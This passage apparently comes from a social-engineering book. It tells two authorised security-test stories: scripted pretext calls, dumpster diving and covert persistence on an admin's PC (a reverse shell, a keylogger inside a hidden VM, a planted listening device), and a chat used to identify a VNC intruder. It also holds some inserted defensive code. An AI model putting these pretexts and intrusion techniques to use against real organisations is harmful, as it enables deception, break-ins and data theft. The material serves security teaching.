Tim was contracted to help the company test its security against a “rogue person” being able to infiltrate and walk out with the goods. Tim met one person from the company at an offsite location to sign the deal they worked out over the phone and e-mail.

The Story

Tim had a huge challenge in front of him. The first stage, as with any social engineering gig, was the information gathering. Not knowing what information he would and wouldn’t use, Tim went full-bore, collecting information such as the e-mail layout scheme, open requests for quotes, all employee names he could find, plus any social media sites they belonged to, papers they wrote and published, clubs they were part of, as well as service providers they used.

He wanted to do a dumpster dive but when he scoped out the place he noticed that security was very strong around the dumpster area. Many of the dumpsters were even enclosed in small walled areas, so he couldn’t see the logos on the dumpster unless he breached the perimeter. After finding out the department that handles waste services, he decided to place a well-planned-out phone call to the company:

“Hello, this is Paul from TMZ Waste Disposal. We are a new waste disposal service in the area and have been working with some of the large corporations in the area. I am part of the sales team that handles your region. Could I send you a quote for our services?”

“Well, we are pretty happy with our present supplier, but you can submit a quote.”

“Excellent; may I ask you just a few quick questions?”

“Sure.”

“How many dumpsters do you have?” asked Tim. After asking whether they used special dumpsters for paper and technology such as USB keys and hard drives, he then laid on a few finishing touches.

“What day is your normal pickup?”

“We have two pickups per week; Set 1 is Wednesdays and Set 2 is Thursdays.”

“Thank you. I can prepare this quote and have it sent over by tomorrow afternoon. What e-mail should I use?”

“Send it to me personally at christie.smith@company.com.”

At this point a little friendly chitchat ensued and before you know it they were laughing and exchanging pleasantries.

“Thanks a lot. Hey, before we hang up can I ask you who you presently use? I like to do a comparative quote.”

“Well, you know…” she hesitated, but then said, “Sure, we use Wasters Management.”

“Thanks Christie, I will make sure you are happy with the quote. We will talk later.”

Armed with this information, Tim went to the website for the present waste management company and copied the logo to a JPG file. He then visited an online shirt printer and in 72 hours had a shirt with the logo in his hands. Knowing that the garbage was picked up on Wednesday and Thursday, he wanted to go Tuesday night.

He then placed another call to the security department:

“Hello, this is John from Wasters Management, your dumpster disposal people. I was called by Christie Smith’s office stating that you have a damaged dumpster. I know the pickup is on Wednesday so I wanted to come out and check it tomorrow night. If there is a damaged unit I will have the truck bring out a new one. Is it okay if I come out Tuesday night?”

“Sure, let me check—yes, Joe is on tomorrow. When you pull up just stop in the security booth and he will give you a badge.”

“Thanks.”

The next day Tim wore his “company” polo shirt and had a clipboard. The pretext was genius because he knew the dates and internal names. Now, looking like a company employee, he approached the security booth.

“Joe, I’m John from Wasters and I called in yesterday.”

The guard interrupted with, “Yes, I see your name right here.” He handed him a badge and a paper map telling him how to get to the dumpsters. “Do you need one of us to tag along?”

“Nah, I do this all the time.”

Tim was buzzed in and drove over to the dumpsters.

Armed with a perfect pretext and a badge he had the time to do some digging. He knew that Set 2 held the non-food garbage, so he started his digging there.

After just a little while he loaded a few hard drives, USB keys, some DVDs, and some clear bags full of paper in his trunk. After about an hour or so he drove back out, thanked the security guys, and assured them all was good. Back at the office he dug through the “garbage” and was greeted with some of the juiciest details he couldn’t have found in his wildest dreams.

Many times companies will dispose of hard drives and USB media by destroying them completely. They will erase all data and then send them to special disposal units. Every now and then, though, employees who don’t think through their disposal procedures will just throw away a USB key they say is broken or a hard drive that no longer boots. What they don’t realize is that there are many programs that can strip data off of even non-bootable drives and media. Even if the media has been formatted, data can still be recovered in many situations.
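The recovery point above, as an added example that is not from the book: a toy disk image with a constructed layout (a directory table in sector 0, file bytes after it) shows that a quick format wipes only the directory, a signature-based carver still pulls the file back, and only overwriting every sector before disposal removes it.

```python
"""Added example (not the book's code): why a formatted drive in a dumpster
still leaks. The disk layout below is constructed for illustration only."""
import struct

SECTOR = 512
DIR_SECTOR = 0  # the directory table lives in sector 0 (constructed layout)

# Constructed sample document: a minimal PDF-shaped blob carrying the
# signature and trailer that signature-based carvers look for.
SAMPLE_PDF = (b"%PDF-1.4\n1 0 obj << /Type /Catalog >> endobj\n"
              b"% constructed sample text: draft IT services contract\n"
              b"%%EOF")


def make_image(files, n_sectors=32):
    """Build an image whose sector 0 lists (name, start, length) entries and
    whose file payloads are laid out sector-aligned from sector 1 onward."""
    img = bytearray(SECTOR * n_sectors)
    entries = []
    cursor = 1
    for name, data in files:
        start = cursor * SECTOR
        img[start:start + len(data)] = data
        entries.append((name, start, len(data)))
        cursor += -(-len(data) // SECTOR)  # ceiling division: sectors used
    # Directory: u32 entry count, then per entry name[16], u32 start, u32 len.
    table = struct.pack("<I", len(entries))
    for name, start, length in entries:
        table += name.encode().ljust(16, b"\0")[:16]
        table += struct.pack("<II", start, length)
    img[:len(table)] = table
    return img


def read_directory(img):
    """What an ordinary file browser sees: names from the directory table."""
    (count,) = struct.unpack_from("<I", img, 0)
    names, off = [], 4
    for _ in range(count):
        names.append(bytes(img[off:off + 16]).rstrip(b"\0").decode())
        off += 24
    return names


def quick_format(img):
    """A quick format: erase the directory sector and nothing else."""
    img[DIR_SECTOR * SECTOR:(DIR_SECTOR + 1) * SECTOR] = bytes(SECTOR)


def secure_wipe(img):
    """Disposal done properly: overwrite every sector of the media."""
    img[:] = bytes(len(img))


def carve_pdfs(img):
    """Recover PDF payloads by signature alone, never consulting the directory.
    This is the kind of recovery the passage alludes to, reduced to one type."""
    found, pos = [], 0
    while True:
        start = img.find(b"%PDF-", pos)
        if start < 0:
            return found
        end = img.find(b"%%EOF", start)
        if end < 0:
            return found
        end += len(b"%%EOF")
        found.append(bytes(img[start:end]))
        pos = end


def demo():
    """Return (files carved after a quick format, files carved after a wipe)."""
    img = make_image([("contract.pdf", SAMPLE_PDF)])
    quick_format(img)
    after_quick = len(carve_pdfs(img))  # directory gone, contents still there
    secure_wipe(img)
    after_wipe = len(carve_pdfs(img))   # nothing left to carve
    return after_quick, after_wipe


if __name__ == "__main__":
    print(demo())
```

Real file systems differ in layout, but the lesson is the same: a drive that "no longer boots" or was merely quick-formatted still carries its contents until every sector is overwritten or the media is physically destroyed.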

 

One of the bags contained what looked like the contents of an office. As he emptied the bag he noticed some papers that had not passed through the shredder. He sat down to read them and saw one was a contract for some IT services that went out for bid. The job was supposed to start in just a few days, but it looked like this particular copy was used to sop up some spilled coffee and then discarded.

This would be a great find, but he had so much more to search through. The DVDs were blank or unreadable, but surprisingly enough he located files on the USB keys. From this information he discovered the names and private lines of the CFO as well as some other key personnel.

The value of what he gathered was immense but I want to focus on what he did next. The next morning, armed with the contract for the IT services in hand and knowing the type of work that was to be performed, he placed a call to the contract point of contact during the lunch hour and prayed the contact was out to lunch.

“Hello, is Sebastian available?”

“No, he is out to lunch. Can I help you?”

“This is Paul from XYZ Tech. I wanted to confirm that our team will be coming to start the project tomorrow evening.”

“Yes, just remember we can’t have any interruption of service so please do not get here any earlier than 5:30 p.m.”

“Yes sir, you got it. See you tomorrow.”

The next day Tim knew that he couldn’t arrive with the rest of the “team.” But if he timed it right he would not be caught by the IT company or the target. Sitting across the dark parking lot he watched the IT contract company arrive. After a good 30 minutes he approached the front door and explained how he just ran out to get some paperwork from his car. He got buzzed in and now had free rein of the office.

He needed to do some reconnaissance, and he figured the best way was to approach the IT company as one of the internal employees. He walked around until he heard some talking and found one of the guys in a shirt identifying him as one of the IT team.

Armed with the names of the upper-level management from the USB key files and from the points of contact from the contract, he began, “Hi there, I’m Paul and I work with Mr. Shivaz [the CFO]—did someone explain to you about the prod23 production server?” Tim had the server name from his information gathering; Tim knew that was the server he was attacking.

“Yes, we know that server is off-limits in this work. The CFO explained to us the encryption and how we are not to mess with that server. No worries.”

After a few more minutes of conversing, Tim had discovered some valuable pieces of information:

  • The IT team is not to touch the server.
  • The server has full disk encryption.
  • The techs were “bragged” to by the in-house IT guy about how the target company used a keyfile on a USB key that only the admins carry.

Tim knew this last point would make his task harder, and because the admins were not in, he would not be able to access the server now. In addition, the physical security around this server was very intense and may have been too hardened to take the risk. He did know that the admins would have access to this server so he thought maybe he would try that avenue.

He visited the first office of the admin, but it was locked. He checked the second office, then the third. The third one was shut but had not been closed all the way and it merely opened when he pushed a little. He was in.

By shutting the blinds and leaving the lights off, he felt he would be protected a bit from the potential of being caught. In his social engineer kit he carried a wide variety of tools and clothing. One of the tools he always had with him on these types of gigs was a USB key that was loaded with a bootable Linux distribution such as BackTrack. In the BackTrack install is a preloaded version of VirtualBox, a free open source virtual machine tool.

He booted the admin’s computer into BackTrack from the USB key, using a rear USB port. After he was in BackTrack, he connected to his own servers via SSH, set up a listener, then connected back to it using a reverse shell he initiated from the admin machine. Then he started a keysniffer (to log all keystrokes typed on the computer) in BackTrack and set up the log file to be dumped through the SSH connection to his computer.

Then he did something truly pernicious. He opened VirtualBox and created a Windows virtual machine (VM), using the local hard drive as the physical media to boot from, and loaded the VM. Automatically, it loaded the admin’s user profile and OS. At the login screen he set the VM to full screen mode, hid all bars, and changed the existing hot key to exit VirtualBox to some ridiculously long combo. This kept the user from mistakenly hitting that combo and revealing the compromise.

A risk still existed that he could be caught at any moment using this method (a rear USB key loading a virtual machine from the machine’s own hard drive), but if it worked he would get every keystroke the admin typed and a shell on the poor guy’s computer, giving Tim access to everything. Even though the shell would be on the virtual machine, he would be logging all of the admin’s keystrokes and could then gain access to the victim’s machine using the captured username and password.

Tim did a few other things in the office such as set up a connection on another machine, which gave him network access remotely. He also set up a remote listening device, the kind that uses a cell phone SIM card. He could call its number from any phone on earth and listen to conversations from anywhere in a 20-foot radius.

After just a few hours Tim left the target’s company and went back to his office. He was excited to see whether this all worked, but he still had a few more ideas to try.

Early the next morning he made sure his remote connections were still alive and he dialed into his listener to hear the early morning buzz of people coming into the office. The anticipation built as he waited to see whether the first computer logs were coming through, capturing the admin’s username and password.

About one hour later Tim saw some logs coming through. He knew that he didn’t want to do anything that would compromise his connection, so he waited. Around 12:15 the logs stopped, so he figured the admin must be at lunch. He quickly checked his reverse shell and began to create a tunnel from the admin’s machine to the server back to his machine using the password he captured from the admin for the server.

After the tunnel was connected he made a mad dash to copy as much as he could before 1:00 p.m. At that point he didn’t notice any logs, so he called into the listener and overheard someone asking, “Do you know how long this meeting is supposed to last?”

Figuring the admin might be at a meeting he made another attempt at a larger transfer. After about 30 minutes he noticed some activity so he stopped data collection and decided to wait until later. He didn’t want to alert the admin to anything fishy going on by slowing down his connection through a large transfer. He started to sift through what he grabbed from the server, knowing he hit the jackpot.

His job wasn’t over yet. That evening he did one more massive transfer, taking as much as he could get and then headed over to the company’s office again, social engineering his way in as he did before. Once in he headed over to the admin’s office, which was locked this time and pulled shut. He used a shove knife (see Chapter 7) to get in.

Once inside he turned off the virtual machine, then rebooted the machine after removing the USB key, and then he left the admin’s office the way he found it. He collected his listener and made sure his tracks were covered.

He exited the building to go back to his office and compile his findings. Of course, at the report meeting he walked in with a stack of printed documents and a hard drive full of what he was able to copy. This was enough to drop the jaws of every person in the room.

将 SE 框架应用于 Top Secret 1

Applying the SE Framework to Top Secret 1

 

This story offers many lessons. It is an example of a perfect social engineer. It can be summed up as practice, preparation, and, of course, information gathering. We can imagine he practiced all the skills he used, from using a shove knife and creating tunnels to effective pretexting and information gathering.

I cannot reiterate enough the importance of information gathering. I know I have said it a thousand times, but this whole deal would have fallen through without Tim having the appropriate information.

Being prepared through phone calls and onsite visits, and having the right hardware, led to success. Analyzing this hack, you can see some of the fundamental principles of social engineering at play.

Tim was a master at information gathering, using web resources to pull up all sorts of nuggets, expert elicitation skills while on the phone, as well as masterful persuasion skills in person. These techniques allowed him to gather data that probably would have been left behind by an unskilled hacker.

Information gathering gave Tim the foundation for what types of pretexts and questions to develop.

The dumpster dive was planned with surgical precision. Does a chance exist that he would have been let in without the shirt and appointment? Sure. Yet how much more powerful was the way he did it? He never left a doubt in their minds and he enabled each person he interacted with to go about their business and never think twice. That is a perfect pretext, when a person can interact with you without any red flags or warning signs going up. Tim did that and it gave him freedom to move around as if he belonged.

The best part of the story is what happened after he got in the building. Such a large margin for error existed, and he could have been caught so many ways. Sure, he could have run in, grabbed the data off the server, and left, and probably no one would have stopped him, but doing it the way he did meant the company never knew how their secrets got out and would never have known they were compromised.

Tim took a huge risk when he left the admin’s computer running a VM. That particular maneuver could have failed in many ways. If someone had ever rebooted the computer or it had crashed, or if by mistake the admin pressed that crazy key combo, it could have spelled the end to the hack and alerted the company that it had been compromised.

I might have taken a different, less-risky route, one where I could have created a reverse tunnel from his computer back to my servers using a custom EXE that would not be detected by antivirus software or show up in the startup scripts of the computer, something with less chance of failure, but Tim’s method had the flair of being a very sexy social engineering hack.

Probably more than one lesson can be learned from this particular hack, but if anything, the old hacker adage of “trust no one” can be applied to some extent. If someone calls to say that Christine authorized a dumpster inspection and you didn’t hear it from her or a memo, call her and ask. Turn your computers off at night and definitely make your important machines not able to boot from USB without a password.

Sure, these extra precautions will mean more work and longer load times. Whether they’re worth doing depends on how important the data that sits behind those machines is. In this case, the data was able to ruin this company, so the protection should have been extreme. Although the company took many excellent precautions, like using full disk encryption, cameras, biometric locks, and so on around the server area, it did not secure the computers that had access to the most important data, and that is what led to the company’s demise.

Top-Secret Case Study 2: Social Engineering a Hacker

Thinking outside the box and having to think fast is standard fare for a social engineer, so it is rare to be in a situation that will challenge the professional social engineer to the point of being stumped. What happens when a penetration tester is called on to put on a social engineering hat without prior warning?

This next account shows exactly what happens when this situation arises. It is a good example of how having certain social engineering skills practiced beforehand can be very useful when called on to use them without warning.

The Target

“John” was called on for a standard network penetration test for one of his bigger clients. It was a no-frills pentest, as social engineering and onsite work were not included in the audit outline. Still, he enjoyed the work of testing out the vulnerabilities on his clients’ networks.

In this particular pentest nothing really exciting was occurring. He was doing his normal routine of scans and logging data and testing out certain ports and services he felt might give him a lead inside.

Near the end of a day he ran a scan using Metasploit that revealed an open VNC server, a server that allows the control of other machines in the network. This was a nice find; because the network overall was locked down, this sort of easy-in was especially welcome.
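The open VNC server John found is a misconfiguration an auditor can recognize from the first bytes the server sends, without ever logging in: a VNC server announces which authentication (security) types it will accept before any session starts. The following is an added example, my own code rather than anything from the book, from John, or from any tool named on this page. It parses the server side of the RFB handshake for both the old 3.3 and the 3.7/3.8 negotiation and classifies the host by whether it advertises the "None" type (no password at all), password-only VNC Authentication, or an authenticated/encrypted type. The security-type numbers come from RFC 6143 and the common registered extensions; the sample greetings are constructed byte strings, so nothing here touches a network.

```python
"""Classify a VNC (RFB) server by the authentication it advertises.

Added example, not code from the book or from the pentester it describes.
Pointed at your own hosts, this tells you which VNC endpoints would accept a
session with no password, which is exactly the weakness the case study hinges
on. The handshake bytes below are constructed; no network I/O is performed.
"""
import re
import struct

# Security types from RFC 6143 section 7.1.2 plus common registered extensions.
SECURITY_TYPES = {
    0: "Invalid",
    1: "None",                 # no authentication at all
    2: "VNC Authentication",   # DES challenge on an 8-byte password, no encryption
    5: "RA2",
    6: "RA2ne",
    16: "Tight",
    17: "Ultra",
    18: "TLS",
    19: "VeNCrypt",
    20: "GTK-VNC SASL",
}

VERSION_RE = re.compile(rb"^RFB (\d{3})\.(\d{3})\n")


def _read_reason(buf: bytes) -> str:
    """Failure reason string: U32 length followed by ASCII text."""
    if len(buf) < 4:
        return "(no reason given)"
    (n,) = struct.unpack(">I", buf[:4])
    return buf[4:4 + n].decode("ascii", errors="replace")


def parse_server_handshake(data: bytes) -> dict:
    """Parse the bytes a VNC server sends first: ProtocolVersion, then its
    security-type announcement (the client's own version reply is not part
    of this buffer). Returns version, advertised type names and a verdict."""
    m = VERSION_RE.match(data)
    if not m:
        raise ValueError("not an RFB server greeting")
    major, minor = int(m.group(1)), int(m.group(2))
    body = data[m.end():]
    reason = None

    if (major, minor) <= (3, 3):
        # RFB 3.3: the server chooses one type and sends it as a U32.
        if len(body) < 4:
            raise ValueError("truncated 3.3 security type")
        (sec_type,) = struct.unpack(">I", body[:4])
        types = [sec_type]
        if sec_type == 0:
            reason = _read_reason(body[4:])
    else:
        # RFB 3.7/3.8: U8 count followed by that many U8 types; count 0 means
        # the server refused the connection and a reason string follows.
        if not body:
            raise ValueError("truncated security type list")
        count = body[0]
        types = list(body[1:1 + count])
        if len(types) != count:
            raise ValueError("truncated security type list")
        if count == 0:
            reason = _read_reason(body[1:])

    names = [SECURITY_TYPES.get(t, f"Unknown({t})") for t in types]
    if reason is not None:
        verdict = f"refused: {reason}"
    elif 1 in types:
        verdict = "INSECURE: accepts unauthenticated sessions"
    elif 2 in types:
        # A client may always pick the weakest offered type, so offering
        # VNC Authentication at all is reported even next to stronger ones.
        verdict = "WEAK: VNC Authentication offered (no transport encryption)"
    else:
        verdict = "OK: authenticated/encrypted types only"
    return {"version": f"{major}.{minor}", "types": names, "verdict": verdict}


# Constructed sample greetings, as captured from five different servers.
OPEN_SERVER = b"RFB 003.008\n" + bytes([1, 1])             # only "None"
PASSWORD_SERVER = b"RFB 003.008\n" + bytes([1, 2])         # VNC Authentication
VENCRYPT_SERVER = b"RFB 003.008\n" + bytes([1, 19])        # VeNCrypt only
LEGACY_OPEN = b"RFB 003.003\n" + struct.pack(">I", 1)      # 3.3 server, type None
REFUSED = b"RFB 003.008\n" + bytes([0]) + struct.pack(">I", 8) + b"too many"

if __name__ == "__main__":
    for label, greeting in [("open", OPEN_SERVER), ("password", PASSWORD_SERVER),
                            ("vencrypt", VENCRYPT_SERVER), ("legacy", LEGACY_OPEN),
                            ("refused", REFUSED)]:
        print(f"{label:9s}", parse_server_handshake(greeting))
```

The verdict tiers are deliberately conservative: a server that lists VNC Authentication beside VeNCrypt is still reported as weak, because the type list is an offer and the connecting client decides which one is used. The fix on the host side is the one the chapter's lesson implies for any remote-control service: require authentication, and put the service behind an encrypted transport or a VPN rather than on an open port.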

 

John was documenting the find with the VNC session open, when suddenly in the background the mouse started moving across the screen. This was a huge red flag, because with this client at this time of the day, no user would be connected and using the system for a legitimate purpose.
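John's red flag was not anything about the mouse itself but the hour: with this client, nobody legitimate would be connected at that time of day, and the transcript shows the intruder had checked the client's time zone for the same reason. That reasoning can be written down as a detection rule so it does not depend on a tester happening to be watching. The following is an added example, my own code and not from the book or from any product; it assumes a constructed log format in which remote-control services record session events with UTC timestamps, converts each event to the site's local time, and flags sessions opened on weekends or outside the business window, raising the severity when the source is external or the session carries no user (an unauthenticated session such as the open VNC server in the story). The hosts, addresses, dates and UTC-5 site offset are all constructed.

```python
"""Flag remote-control sessions that start outside a site's working hours.

Added example; not code from the book or from the pentester it describes.
Events are logged in UTC, converted to the site's local time, and flagged when
they start on a weekend or outside the business window. The log format, log
lines, host names and addresses are constructed for this example.
"""
import re
from datetime import datetime, time, timedelta, timezone

# Constructed log format: <UTC timestamp> <host> <service> <event> src=<ip> [user=<name>]
LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<host>\S+) (?P<service>\S+) (?P<event>\S+)"
    r" src=(?P<src>\S+)(?: user=(?P<user>\S+))?$"
)

# The client in the story sat in the central US. A fixed UTC-5 offset is used
# here so the example needs no tz database; a real deployment would use
# zoneinfo.ZoneInfo("America/Chicago") so that DST transitions are handled.
SITE_TZ = timezone(timedelta(hours=-5), "CDT")
BUSINESS_START, BUSINESS_END = time(7, 0), time(19, 0)
INTERNAL_PREFIXES = ("10.",)   # constructed: the site's internal address range

# Constructed sample log. 2010-03-17 is a Wednesday, 2010-03-20 a Saturday.
SAMPLE_LOG = """\
2010-03-16T14:05:11Z fileserver01 vnc session_open src=10.0.4.17 user=jsmith
2010-03-16T21:40:02Z fileserver01 vnc session_open src=10.0.4.17 user=jsmith
2010-03-17T05:12:48Z fileserver01 vnc session_open src=203.0.113.77
2010-03-17T06:03:30Z admin-ws vnc session_open src=198.51.100.9
2010-03-17T15:30:00Z admin-ws rdp session_open src=10.0.4.22 user=admin
2010-03-20T16:00:00Z admin-ws vnc session_open src=10.0.4.22 user=admin
2010-03-17T05:20:01Z fileserver01 vnc session_close src=203.0.113.77
"""


def parse_line(line):
    """Return a dict for one log line, or None if it does not match the format."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return rec


def off_hours_sessions(log_text, site_tz=SITE_TZ, start=BUSINESS_START, end=BUSINESS_END):
    """Return findings for session_open events outside the site's working hours.

    Severity is 'high' when the source is not an internal address or the
    session carries no user attribute (unauthenticated), otherwise 'medium'.
    """
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["event"] != "session_open":
            continue
        local = rec["ts"].astimezone(site_tz)   # judge the hour in the site's clock, not UTC
        reasons = []
        if local.weekday() >= 5:
            reasons.append("weekend")
        if not (start <= local.time() < end):
            reasons.append("outside business hours")
        if not reasons:
            continue
        external = not rec["src"].startswith(INTERNAL_PREFIXES)
        if external:
            reasons.append("external source")
        if rec["user"] is None:
            reasons.append("no user (unauthenticated session)")
        findings.append({
            "host": rec["host"],
            "service": rec["service"],
            "src": rec["src"],
            "user": rec["user"],
            "local_time": local.strftime("%Y-%m-%d %H:%M %Z"),
            "severity": "high" if external or rec["user"] is None else "medium",
            "reasons": reasons,
        })
    return findings


if __name__ == "__main__":
    for f in off_hours_sessions(SAMPLE_LOG):
        print(f["severity"].upper(), f["local_time"], f["host"], f["service"],
              f["src"], f["user"] or "-", "; ".join(f["reasons"]))
```

Run against the constructed log, the two night-time sessions from outside addresses with no user come out as high-severity findings and the Saturday admin session as medium; the daytime sessions produce nothing. The same rule also covers the first case study, where Tim's largest transfers from the admin's workstation ran in the evening and overnight.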

 

What could be happening? He noticed that instead of acting like an admin or normal user, this person appeared to be not very knowledgeable about the system. He suspected there was an unwanted intruder in the network. He didn’t want to scare the intruder away but he wanted to know whether he was an admin or another hacker who found his way into the very same system.

Quickly the target went from being the company he was hired to pentest to a rogue hacker inside the organization.

The Story

John decided quickly that he would have to social engineer this hacker and get as much information as possible to help safeguard his client. He didn’t really have time to think through every step and plan out properly. He didn’t have time to do the appropriate information gathering.

He took a big risk and opened Notepad. Quickly he developed the pretext that he was a “n00b” hacker, a newbie, someone unskilled, who found this box open and was hacking it, like this guy. He was able to obtain some screenshots of the conversation. Take a look and notice how the pentester had to social engineer the hacker, as shown in Figure 8-1. John starts the conversation and every other line is the hacker.

Figure 8-1: An actual screen shot of the event.

Following is the verbatim transcript of the conversation that took place. It is long, and all typos and jargon appear in the original, but the transcript shows exactly what transpired in this hack. John speaks first.


whats up?

 

hehe, just looking around

 

yeah, me too. Anything good?

 

you're a "hacker" too? U was just looking for unsecured VNC servers

 

U=I

 

I was looking forsomething easy. this was easy. ;) You see anything else on this network? This is the only one I got.

 

Didn't find anything else of interest here, most is secured pretty good. Yeah, easy to gain access, but I want admin priviliges... :D

 

Yeah, would be easy from here. Just a priv elev. I am interested inwhat else is here. What is this spreedsheet that is always up?

 

I have no idea, it was heere when I logged in, I havn't been around much. Found this computer 2 hours ago maybe. What about you?

 

I had it for about a week. Off and on. Just did not do anything with it. Sort of lazy. What was your test file from rapid share?I just dumped strings on it and don't reconize anything.

 

Cool. Well, the file was just a test i made, was trying to see if I could get a server (trojan) running. But the firewall didn't allow it.

 

lol. I had the same problem. I did metasplit shell and no-go. Thats why I kept using this. You in the us? or out of country? I know some people in denmark.

 

I'm from Norway actually, hehe, I have relatives in Denmark.

 

You hang in any boards? like I used to like some but they have been going away

 

I mostly hang in some programming boards, but not much else. Have you been into hacking for a long time or what? What's your age btw? I'm 22.

 

I have been on this for like fun for around a year or so. Still in school. 16. Just something to do. You ever go to evilzone?

 

Haven't been there. I too mostly do this for fun, just trying to see what I can do, test my skills. I wrote the "VNC finder" myself btw, I have found a lot of servers, but this is the only one where I could actually have some fun

 

Wow. What did you write it in? Can I dl it? Do you have a handle?

 

It's written in a language called PureBasic, but it's kinda not ready for release yet, it's only for my own use. But maybe I can share it anyway, I could upload the code somewhere and let you compile it. That is if you can find some PureBasic compiler on some warez site :P

 

Thats cool. you can put it in that pastebin site from irc. That lets you anon post I have not done purebasic before. just python and perl

 

Let me see, I'll look for that pastebin site and upload it, just give me some minutes, I'll be around.

 

Ok cool! do you have a handle?I I go by jack_rooby

 

Handle, for what? I don't chat on irc much or anything like that, but I could give you an email you could reah me on.

 

Thats cool. I mean handle like for irc and boardz and the such. heay e-mail works too.

 

Yeah, at the programming board I share my full name, etc. Maybe not too smart to share just yet. My email is: intruder@hotmail.com

 

Send me a message or whatever and I can add you on msn maybe.

 

I will send you a note. It is good to have someone that can program to know for this sort of stuff for when I get stuck or find something good

 

Hehe, yeah, we could be a team :P

 

Cool! let me know when you did the pastebin

 

http://pastebin.ca/1273205

 

btw... that is kinda very in the "alpha" stage, the GUI is not really finished. but it can be configured through some viariables.

 

Cool. I will test it and see what I can do with it. Thanks for sharing. if I do something cool, should I e-mail you?

 

Yeah, please do. If you run this program for some hours you'll find a lot servers, I even tried to make some code to detect servers that has no security and even some that has a bug which can let you log in even if it has a password. These servers will show up in the result (the "found tab") as "insecure". But sometimes it does a mistake and says some are insecure which are not, but that's not many, it's just to test them.

 

Wow. I saw some other vnc servers here too, but they all wanted passwords. Does your tool let us in to that?

 

Just a very few has the bug which can let you in, but you must use the special client for them, more info here btw:

 

http://intruderurl.co.uk/video/

 

Download the zip file.

 

Olol, k, soI wrry

 

sorry. Ok, I will dl that and have a look. Thats cool. Did you write the backdoor from rapid share too? or did you get that from someplace?

 

I try to write most of my tools myself, this way I learn. So yes, I wrote it myself, but it was not finished, I was just wanna see if I could run a server, but it didn't doo anything yet, hehe.

 

I see. I sort of gave up, but I thought I would come back and try some more.I figure there has to be some stuff around but I don't have a botnet of myown to use, this guy named Zoot54 tried to sell me one, and some people vouched for him, but I did not trust him at all. And I don't know how to write my own tools at all other then some perl and python which wont work for most windows hosts like this so I have been tryingthe metasploit but getting the firewall error. Do you have plans for this? Like something cool to do? or just moveon to the next?

 

Perl and python is a good start btw, I haven't been using them myself, but when you know some languages you can easily learn more :P Maybe you should give PureBasic a try, it's really easy actually. Hehe, a bot-net would be cool, I was thinking about making one, but it's kinda hard to make it spread, at least on Vista. But nah, I can't give up this server just yet, I have to try some more, there has to be a way to get more priviliges ;D

 

thast cool. You can have the server as I have had it for a while and don't know what to do next. let me know what you are doing if you would so I can learn some more though. That would be cool. Do you have a myspace or facebook or anything? Or just use the e-mail?

 

E-mail works for now, when I trust you more maybe I can add you on facebook, I don't have myspace. Yeah, I'll keep you updated :)

 

Cool that works for me. Do you have a shell or do you have this same gui? Is it just a multi connection vnc?

 

Yeah, I just used ThightVNC or whatever and made it not disconnect other users. I'm not a shell fan really, hehe :S

 

Cool. When I get a shell a lot of times I makes mistake tand dissconnect on accident

 

Good you didn't dissconnect me :D Btw, when I first saw you messing around I was like "damn, the administrator is here", hehehe...

 

Hah, no I looked up the time zone and they are in the middle of the US so it is the middle of the night for them.

 

Yeah, I did the same thing. Even did a speed test of the internet connection, hehe.They seem to have faster upload speed than download speed, weird... But handy for a DoD attack maybe.

 

DoS, i mean.

 

weird I woner what type of line it is its says it it from co. which I thought was a funny name.. Did you ever get any other systems here? I wonce saw a warez server but that was a long time ago and it is gone now.

 

Haven't found any other systems. But I would sure like to access all these network computers they have... damn many, it's some kind of university. Hehe, I printed out "hello world" previous today.

 

Haha did you send it to a printer or to the screen? these people would more then likkely freak out if they saw the mouse start mooving on them in the middle of the day whith tht weird spreadsheet

 

Haha, they probably woold, but what silly idiots runds a VNC server without a password?! I printed to some of the printers, I hope somebody saw it.

 

Haha thats is true, i bet som.. well they cant run it with out admin privs right? So it cant be just some user that did it, someone with admin would have to do it or else our backdoors should work on it and they are not going at all. Or do you think some one just changed the config?

 

Hmm, well, i think you're right, maybe some admin or prankster..

 

Do you do this work for a living? I keep hearing you can make money with it, and I think if I do this for a while and get to be good I might be able to get a job with it. Is that what you did?

 

I have earned money on programming, but never on hacking or security stuff. But that's a good idea, people would pay to get their security tested and if we get good enough we could probably earn a lot this way.

 

Thats what I hope. I bought a book on the ethical hacker and think that they have some good programs in there. I don't know what the age is to take the test, but if I do take it that might be a good start to do this work. And there are some good tools in there like the metasploit. You should take a look at it if you have not yet.

 

Yeah, thanks, I should check that out :) But I'm getting a little tired now btw, hehe. Can't sit here chatting in bloody notepad all day, hehehehe. So cya later man, cool meeting you, very fun. 

 

Yeah I was scared when I saw the rapid share up on the screen. Cool to meet you and I will e-maiul you and let you know how the program works. Tht is exciting to try that out and see what happens. You stay safe and don't like the bad guys find you!

 

Hehe, thanks, the same for you btw! :) This was interesting, I think I'll save this notepad log btw, give me a sec,lol...

 

there, lol, sorry

 

goodbye

 

bye

 
 

This chat reveals how quickly John had to pretext and become someone else. This is not an easy task, as usually it takes a lot of planning, but to secure his client and find out who this intruder was he had to play whatever role the “hacker” was going to put him in.

In the end, John ended up getting his picture, e-mail, and contact info. He reported this malicious hacker to his client and the problem was fixed to not allow such free rein in and out of its systems.

This top-secret case shows just how social engineering used in a professional sense can go a long way toward securing the clients.

Applying the SE Framework to Top-Secret Case Study 2

What I find interesting in this account is how the company wasn’t really a target for the hacker. He was merely scanning the Internet for “low-hanging fruit” and that is exactly what he found. Open machines with full access are dangerous and this account shows just how much damage could have occurred if the pen tester was not sitting there just at the right time.

There is, of course, a lot one can learn about social engineering from this story, too. John did not come into this project with the idea of using his social engineering skills. Instead it was a straight out pentest. Sometimes you are called on to use your skills without being able to plan first.

What might have enabled John to be able to do this without having to go home and have a practice session? Most likely these skills were something that John used daily or that he at least practiced often enough to make him agile in his use of them.

The main lesson in this case study is probably practice makes perfect. Realistically, John could have confronted the hacker, told him he was an admin and that he was being logged, and that his life was over. All sorts of threats could have flown back and forth and he could have tried to use fear as his main tactic.

Most likely, the hacker would have fled the scene only to return later and try to format the system or do even more damage to cover his tracks. Instead, thinking very fast, John was able to farm a lot of usable information on his target. John later used the target’s e-mail address and name and a good copy of Maltego to get a very clear picture of this individual’s activities.

